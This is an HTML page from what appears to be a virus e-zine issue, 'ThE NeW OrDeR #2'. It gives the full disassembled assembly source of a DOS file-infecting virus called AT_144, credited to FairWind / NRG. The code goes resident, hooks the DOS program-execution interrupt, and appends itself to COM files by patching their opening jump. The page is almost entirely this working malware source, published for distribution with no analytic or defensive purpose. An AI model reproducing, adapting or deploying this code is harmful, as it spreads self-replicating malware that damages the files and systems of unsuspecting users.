<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>AT_144</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.model tiny<br>
.286<br>
.code<br>
org 100h<br>
<br>
start:<br>
db 0e9h,02,0<br>
<br>
Host_File:<br>
int 21h<br>
<br>
Virus_Entry:<br>
pusha<br>
mov di,si<br>
call Get_Displacement<br>
<br>
Get_Displacement:<br>
pop si<br>
add si,31h<br>
movsb<br>
movsw<br>
<br>
mov ax,24h<br>
mov es,ax<br>
xor di,di<br>
sub si,3Ah<br>
cmp byte ptr es:[di],60h<br>
mov cl,90h<br>
rep movsb<br>
<br>
jz Done_Install<br>
mov ds,cx<br>
mov si,84h<br>
movsw<br>
movsw<br>
mov word ptr [si-4],3Ah<br>
mov [si-2],ax<br>
push cs<br>
pop ds<br>
<br>
Done_Install:<br>
push cs<br>
pop es<br>
popa<br>
jmp si<br>
Jump_Byte db 0e9h<br>
Storage_Bytes:<br>
mov ax,4c00h<br>
<br>
Int_21_Handler:<br>
pusha<br>
push ds<br>
xor ah,4Bh<br>
jnz Exit_Handler<br>
mov ax,3D02h<br>
int 0B4h<br>
jc Exit_Handler<br>
mov bx,ax<br>
push cs<br>
pop ds<br>
mov ah,3Fh<br>
mov cx,3<br>
mov dx,37h<br>
mov si,dx<br>
int 0B4h<br>
cmp byte ptr [si],4Dh<br>
je Close_File<br>
mov ax,4202h<br>
xor cx,cx<br>
xor dx,dx<br>
int 0B4h<br>
sub al,3<br>
mov bp,ax<br>
mov cl,90h<br>
sub ax,cx<br>
cmp ax,[si+1]<br>
</strong></font><font color="#FFFFFF"><strong>je Close_File<br>
mov ah,40h<br>
int 0B4h<br>
mov ax,4200h<br>
xor cx,cx<br>
int 0B4h<br>
mov ah,40h<br>
lea dx,[si-1]<br>
mov cl,3<br>
mov [si],bp<br>
int 0B4h<br>
<br>
Close_File:<br>
mov ah,3Eh<br>
int 0B4h<br>
Exit_Handler:<br>
pop ds<br>
popa<br>
db 0EAh<br>
end_virus:<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../Images/coollogo_com_21259199.jpg" border="0" width="518"
height="56"></a></p>
</body>
</html>
